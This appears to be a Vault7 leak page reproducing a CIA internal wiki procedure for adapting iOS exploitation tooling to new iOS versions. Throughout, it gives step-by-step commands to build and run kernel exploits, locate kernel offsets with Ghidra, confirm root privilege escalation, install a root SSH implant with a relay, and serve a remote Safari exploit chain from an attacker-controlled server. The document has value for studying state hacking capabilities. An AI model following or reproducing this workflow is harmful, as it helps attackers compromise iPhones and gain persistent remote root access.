Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
iOS Triage Process
_This describes the process need to been done when a new iOS version is updated.
List of tools new needed
- Xcode Developer Disk Image (DMG)
- Install Xcode (get the lastest released)
- find DMG in xcode directory
- put with other DMG ( redux/res/dmg )
Pre Setup
- Make a directory store output folders
- mkdir $OUT
- Grab a testdylib for testing
- get testdylib_manifest
- cd into testdylib_repo/testdylib
- make
- "<PATH>/testdylib_repo/Build/Release-iPhoneOS/testdylib/testmain" will now be referred to as $TEST_DYLIB
export "<PATH>/testdylib_repo/Build/Release-iPhoneOS/testdylib/testmain"
- Grab the entire ios_manifest
- path to your ios_repo dir will now be $IOS_REPO
export IOS_REPO="<PATH>/ios_repo"
- path to your ios_repo dir will now be $IOS_REPO
-
Make sure ghidra_dir installed
must be at least version 6
in your ghidra install look for a folder that contains "ghidraRun"
- path leading up to this file is now your $GH_PATH
- export GH_PATH=<path>
- use full not relative path
Saline
- cd $IOS_REPO/saline
- make clean
- make
- run saline
- $IOS_REPO//Dist/Release-MacOSX/saline $TEST_DYLIB
Adderall
- cd into $IOS_REPO/nightversion/python/nv_kern_read_command.py
- update kern start
- in get_ios_type, verify correct version number is in there
- update make files in $IOS_REPO/early-make by adding new prefix to new to the lists
- early-bokken
- early-close
- early-persist
- early-remote
- update rana
- update match function in $IOS_REPO/rana/ranas/<proper>_rana.py
- <proper> is most likely saline
- cd $IOS_REPO/adderall
- make clean
- make
- under $OUT make a folder for adderall files
- mkdir $OUT/adder_files
- we will call it $AD_OUT
- export AD_OUT="$OUT/adder_files"
- cd $IOS_REPO/Dist/Release-MacOSX/adderall-dist
- ./adderall-dist $AD_OUT
- Hopefully have execution
- If theses are beta version then copy the folder in your $AD_OUT to: /Volumes/share/MDB/iOS/iOSFiles-Beta/
- If theses are beta version then copy the folder in your $AD_OUT to: /Volumes/share/MDB/iOS/iOSFiles/
Symdra / Elsym
- under $OUT make a folder for adderall files
- mkdir $OUT/sym_files
- we will call it $SYM_OUT
- export SYM_OUT="$OUT/sym_files"
- create branch for elsym-dist
cd $IOS_REPO/elsym-dist/
git checkout -b <descriptive_name>
-
cd back to $IOS_REPO
cd $IOS_REPO
- run symdra from the $IOS_REPO directory
- python symdra/ full -k $AD_OUT -a $SYM_OUT -g $GH_PATH -b <build_number_for_device>
- ex. "-b 13A4325c"
- (YES you are running python on a folder)
- python symdra/ full -k $AD_OUT -a $SYM_OUT -g $GH_PATH -b <build_number_for_device>
- When done symbol.db in $SYM_OUT
- This will be feed into Elsym
- ...TO BE CONTINUED...
- python symdra/ -h
- python symdra/ full -k </tmp> -a <results folder> -g <ghidra_dir> -b <min_build_version>
- /tmp should have IPSW from adderall (ios files from before)
- a copy should be up on the share
- create a temp file for your results
- ghidra must be at least 6
- build version is your target (also from ios files)
- /tmp should have IPSW from adderall (ios files from before)
- When done symbol.db in the analysis directory
- This will be feed into Elsym
- sqlite3 <output folder>/<IPSW>/symbol.db
- select * from [ Master_Symbols ];
- .exit
- cd ../elsym
- git status
- git branch feature/ios-<version>
- git checkout feature/ios-<version>
- el.py
- make sure build number is in the list
- might need to change "EL_CONFIG_LWVM_PARITION_FLAG_OFFSET"
- For iOS 8.4 we had to change it to 0x28. To determine:
- Open ghidra
- File -> Open Project
- goto the symdra_results/<IPSW>/Ghidra/kernelcache.gpr
- Open the System.kext and search for the string "disk0s1", "disk0s1s1", "Writable", and/or "UUID"
- This function is bsd_init (note this is heavily inlined and may not fully decompile)
- Find the call to _VNOP_IOCTL
- The second parameter is the ioctl number we need (in the past was 0xc01064c2 but might be broken into two instructions)
- Note the ioctl number
- Open com.apple.driver.LightweightVolumeManager.kext
- Search Program Text for the ioctl number (note you may want to search for half of it at a time) being used in a comparison
- This function is the ioctl handler
- Inside the true block of the conditional, look for the constants on the ioctl
- One of the commands sets a read-only field (1), the offset for this field is the LWVM_PARTION_FLAG_OFFSET.
- For iOS 8.4 we had to change it to 0x28. To determine:
- run and see what happens
- ZOO_IPSW_PATH=<results folder> make copyonedist ZOO_TARGET=<target>
- _kernel_memory_allocate is only used for the development
- ls ../elsym-dist/<IPSW>.plist
- python verify ../elsym-dist/
- no back files found ( doesn't mean that all files are good, just didn't find it)
- print_config.py ../elsym-dist/<IPSW>.plist
Nightvision
- can be done under the adderral or the ios manifest
- cd adderral
- cd nightvision
- make dist
- ../Dist/Release-iPhoneOs/nv -c ../early/elsym-dist/ get -o <outdir>/
- find /private/var/root in file list to verify privilege escalation worked
El_util
- cd early_manifest
- make ZOO_IPSW="<target>"
- el_runo.sh don't use even if it is in the directory
- cd ../rana
- make
- python ../Build/Release-MacOS/rana.pyz -a execute Build/Relase-iPhoneOS/elutil/<IPSW>/el_priv
- should be "uid = 0, euid = 0"
El_unit
- cd elunit
- ZOO_ISPW_PATH=~/tmp/ make
- need a device on the developer profile
- should only have 1 failed test
El_ssh
- go into el_ssh
-
ZOO_IPSWS="<target>" EL_SSH_ACCESS="close" ZOO_ISPW_PATH=<outdir> make
If you get the following error
el_ssh/Makefile:46: *** No ipsw resources for <target> . Stop.
- copy the plist from your elsym-dist from the symdra test into the elsym-dist in your manifest
- ../Dist/Release-iPhoneOS/el_ssh install
- ../Dist/Release-iPhoneOS/el_ssh run
- ../Dist/Release-iPhoneOS/el_ssh dumpkey ssh.key
- ../Dist/Release-iPhoneOS/el_ssh relay -p 2222
- ssh -i ssh.key -p 2222 root@localhost
- ls bin_nohash
Remote
- under testdylib manifest
- in testdylib make dist
- under mcnugget manifest
- cd mcnugget
- make
- cd mcp_archon
- archon.py
- variable = iOS
- earth.py
- variable = iOS
- soul.py
- (doesn't actually check version) we are good
- safari
- settings advance Web Inspector on
- Settings -> Advanced -> Web Inspector
- settings developer enable UIUser Interface automation
- settings advance Web Inspector on
- ZOO_IPSW_PATH=~/temp/ ZOO_CONFIG=Release make delivery
- cd ../Build/Release-MacOSX/mcnugget/
-
./mc_creator plist --url http://<ip>:8080 --server-port 8080 -t myid mc.plist --console --passphrase ""
<ip> is the ip of your Mac ( not your iDevice)
- OR if your feel like cheating ./mc_creator plist --url http://`ifconfig | grep "inet 10" | cut -d " " -f 2`:8080 --server-port 8080 -t myid mc.plist --console --passphrase ""
./solcreate mc.plist /<path>/testdylib.zip -t myid -o myid.sol --nonpersist
./mc_creator server mctest mc.plist mcplugins/mcp_* myid.sol
-
./mctest
press enter when prompted for passphrase
- wait for ENGINE Bus STARTED
- Make sure device is on wifi
- Connect device via usb
- then run python mdf syslog
- verify safari is not loaded in memory on target
- On device open safari
- then browse to http://<ip>:8080/?id=myid
- On mctest log you should see
"exploitation succeeded, deleting from target dictionary"
-
In the syslog you should see the
- "iPhone locationd[57] <Emergency>: ==== Testdylib Started at:"
Persistence
Test of vulnerability
- install el_ssh
- git the grist_manifest
- init repo
- goto into the dyld-js folder in the repo
make dylinker_test ZOO_CONFIG=Debug
~/git2/el_ssh_manifest/Dist/Release-iPhoneOS/scp -i <key file> ../Build/Debug-iPhoneOS/dyld-js/dylinker_test_<arch>.js root@<device ip>:
ssh -i <key file> root@<device ip>
/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc dylinker_test_64.js
- You should see [dylinker] 5 of 5 passed.
Related articles
iOS Firmware Updating to latest procedure / Adding Exploit Support For New Devices
('contentbylabel' missing)
('details' missing)